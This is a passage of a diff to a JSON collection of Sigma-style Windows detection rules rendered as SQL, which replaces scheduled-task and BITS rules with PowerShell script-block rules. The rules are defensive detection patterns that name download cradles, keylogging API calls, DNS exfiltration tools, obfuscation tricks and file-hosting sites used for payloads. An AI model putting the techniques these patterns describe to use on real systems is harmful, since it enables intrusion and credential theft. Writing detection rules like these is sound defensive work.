'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", - "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Remove-Item to Delete File", + "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "status": "test", + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_remove_item_path.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + 
"attack.t1056.001" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Suspicious Task Added by Bitsadmin", - "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "title": "Suspicious Process Discovery With Get-Process", + "id": "af4c87ce-bdda-4215-b998-15220772e993", "status": "test", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "description": "Get the processes that are running on the local computer.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate PowerShell scripts" ], 
"level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_use_bitsadmin.yml" + "filename": "posh_ps_susp_get_process.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. 
Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' 
ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" - ], - "filename": "win_bits_client_direct_ip_access.yml" - }, - { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.execution" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Task Added by Powershell", - "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through 
[Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate script" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_susp_powershell_job.yml" - }, - { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "filename": "posh_ps_invoke_dnsexfiltration.yml" + }, + { + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is 
removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' 
ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft 
Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", - "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee 
Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", + "status": "experimental", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "title": "Potential PowerShell Obfuscation Using Character Join", + "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' 
ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_susp_alias_obfscuation.yml" }, { - "title": "USB Device Plugged", - "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "status": "test", - "description": "Detects plugged/unplugged USB devices", - "author": "Florian Roth (Nextron Systems)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1200" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Administrator script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": 
"win_usb_device_plugged.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", - "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "title": "Suspicious Get Information for SMB Share", + "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "status": "test", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of 
information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' 